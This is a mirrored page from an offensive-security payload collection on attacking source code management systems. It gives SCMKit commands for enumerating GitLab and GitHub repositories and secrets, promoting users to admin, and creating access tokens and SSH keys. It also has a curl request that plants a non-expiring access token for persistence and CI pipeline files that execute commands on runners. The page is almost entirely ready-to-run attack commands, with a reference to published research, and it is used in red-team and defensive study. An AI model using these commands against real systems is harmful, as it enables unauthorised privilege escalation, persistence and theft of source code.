mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-29 15:55:25 +00:00
125 lines
5.2 KiB
Markdown
125 lines
5.2 KiB
Markdown
|
# Source Code Management
|
||
|
|
||
|
>
|
||
|
|
||
|
## Summary
|
||
|
|
||
|
* [Enumeration](#enumeration)
|
||
|
* [Exploit Gitlab CI/Github Actions](#exploit-gitlab-cigithub-actions)
|
||
|
* [References](#references)
|
||
|
|
||
|
|
||
|
## Enumeration
|
||
|
|
||
|
|
||
|
Using [SCMKit - Source Code Management Attack Toolkit](https://github.com/xforcered/SCMKit)
|
||
|
|
||
|
* Discover repositories being used in a particular SCM system
|
||
|
```ps1
|
||
|
SCMKit.exe -s gitlab -m listrepo -c userName:password -u https://gitlab.something.local
|
||
|
SCMKit.exe -s gitlab -m listrepo -c apiKey -u https://gitlab.something.local
|
||
|
```
|
||
|
* Search for repositories by repository name in a particular SCM system
|
||
|
```ps1
|
||
|
SCMKit.exe -s github -m searchrepo -c userName:password -u https://github.something.local -o "some search term"
|
||
|
SCMKit.exe -s gitlab -m searchrepo -c apikey -u https://gitlab.something.local -o "some search term"
|
||
|
```
|
||
|
* Search for code containing a given keyword in a particular SCM system
|
||
|
```ps1
|
||
|
SCMKit.exe -s github -m searchcode -c userName:password -u https://github.something.local -o "some search term"
|
||
|
SCMKit.exe -s github -m searchcode -c apikey -u https://github.something.local -o "some search term"
|
||
|
```
|
||
|
* Search for files in repositories containing a given keyword in the file name in a particular SCM system
|
||
|
```ps1
|
||
|
SCMKit.exe -s gitlab -m searchfile -c userName:password -u https://gitlab.something.local -o "some search term"
|
||
|
SCMKit.exe -s gitlab -m searchfile -c apikey -u https://gitlab.something.local -o "some search term"
|
||
|
```
|
||
|
* List snippets owned by the current user in GitLab
|
||
|
```ps1
|
||
|
SCMKit.exe -s gitlab -m listsnippet -c userName:password -u https://gitlab.something.local
|
||
|
SCMKit.exe -s gitlab -m listsnippet -c apikey -u https://gitlab.something.local
|
||
|
```
|
||
|
* List all GitLab runners available to the current user in GitLab
|
||
|
```ps1
|
||
|
SCMKit.exe -s gitlab -m listrunner -c userName:password -u https://gitlab.something.local
|
||
|
SCMKit.exe -s gitlab -m listrunner -c apikey -u https://gitlab.something.local
|
||
|
```
|
||
|
* Get the assigned privileges to an access token being used in a particular SCM system
|
||
|
```ps1
|
||
|
SCMKit.exe -s gitlab -m privs -c apiKey -u https://gitlab.something.local
|
||
|
```
|
||
|
* Promote a normal user to an administrative role in a particular SCM system
|
||
|
```ps1
|
||
|
SCMKit.exe -s gitlab -m addadmin -c userName:password -u https://gitlab.something.local -o targetUserName
|
||
|
SCMKit.exe -s gitlab -m addadmin -c apikey -u https://gitlab.something.local -o targetUserName
|
||
|
SCMKit.exe -s gitlab -m removeadmin -c userName:password -u https://gitlab.something.local -o targetUserName
|
||
|
```
|
||
|
* Create/List/Delete an access token to be used in a particular SCM system
|
||
|
```ps1
|
||
|
SCMKit.exe -s gitlab -m createpat -c userName:password -u https://gitlab.something.local -o targetUserName
|
||
|
SCMKit.exe -s gitlab -m createpat -c apikey -u https://gitlab.something.local -o targetUserName
|
||
|
SCMKit.exe -s gitlab -m removepat -c userName:password -u https://gitlab.something.local -o patID
|
||
|
SCMKit.exe -s gitlab -m listpat -c userName:password -u https://gitlab.something.local -o targetUser
|
||
|
SCMKit.exe -s gitlab -m listpat -c apikey -u https://gitlab.something.local -o targetUser
|
||
|
```
|
||
|
* Create/List an SSH key to be used in a particular SCM system
|
||
|
```ps1
|
||
|
SCMKit.exe -s gitlab -m createsshkey -c userName:password -u https://gitlab.something.local -o "ssh public key"
|
||
|
SCMKit.exe -s gitlab -m createsshkey -c apiToken -u https://gitlab.something.local -o "ssh public key"
|
||
|
SCMKit.exe -s gitlab -m listsshkey -c userName:password -u https://github.something.local
|
||
|
SCMKit.exe -s gitlab -m listsshkey -c apiToken -u https://github.something.local
|
||
|
SCMKit.exe -s gitlab -m removesshkey -c userName:password -u https://gitlab.something.local -o sshKeyID
|
||
|
SCMKit.exe -s gitlab -m removesshkey -c apiToken -u https://gitlab.something.local -o sshKeyID
|
||
|
```
|
||
|
|
||
|
## Personal Access Token
|
||
|
|
||
|
Create a PAT (Personal Access Token) as a persistence mechanism for the Gitlab instance.
|
||
|
|
||
|
```ps1
|
||
|
curl -k --request POST --header "PRIVATE-TOKEN: apiToken" --data "name=user-persistence-token" --data "expires_at=" --data "scopes[]=api" --data "scopes[]=read_repository" --data "scopes[]=write_repository" "https://gitlabHost/api/v4/users/UserIDNumber/personal_access_tokens"
|
||
|
```
|
||
|
|
||
|
## Exploit Gitlab CI/Github Actions
|
||
|
|
||
|
* Gitlab-CI "Command Execution" example: `.gitlab-ci.yml`
|
||
|
```yaml
|
||
|
stages:
|
||
|
- test
|
||
|
|
||
|
test:
|
||
|
stage: test
|
||
|
script:
|
||
|
- |
|
||
|
whoami
|
||
|
parallel:
|
||
|
matrix:
|
||
|
- RUNNER: VM1
|
||
|
- RUNNER: VM2
|
||
|
- RUNNER: VM3
|
||
|
tags:
|
||
|
- ${RUNNER}
|
||
|
```
|
||
|
* Github Action "Command Execution" example: `.github/workflows/example.yml`
|
||
|
```yml
|
||
|
name: example
|
||
|
on:
|
||
|
workflow_dispatch:
|
||
|
push:
|
||
|
branches: [ main ]
|
||
|
pull_request:
|
||
|
branches: [ main ]
|
||
|
|
||
|
jobs:
|
||
|
build:
|
||
|
runs-on: windows-2019
|
||
|
|
||
|
steps:
|
||
|
- name: Execute
|
||
|
run: |
|
||
|
whoami
|
||
|
```
|
||
|
|
||
|
## References
|
||
|
|
||
|
* [Controlling the Source: Abusing Source Code Management Systems - Brett Hawkins - August 9, 2022](https://securityintelligence.com/posts/abusing-source-code-management-systems/)
|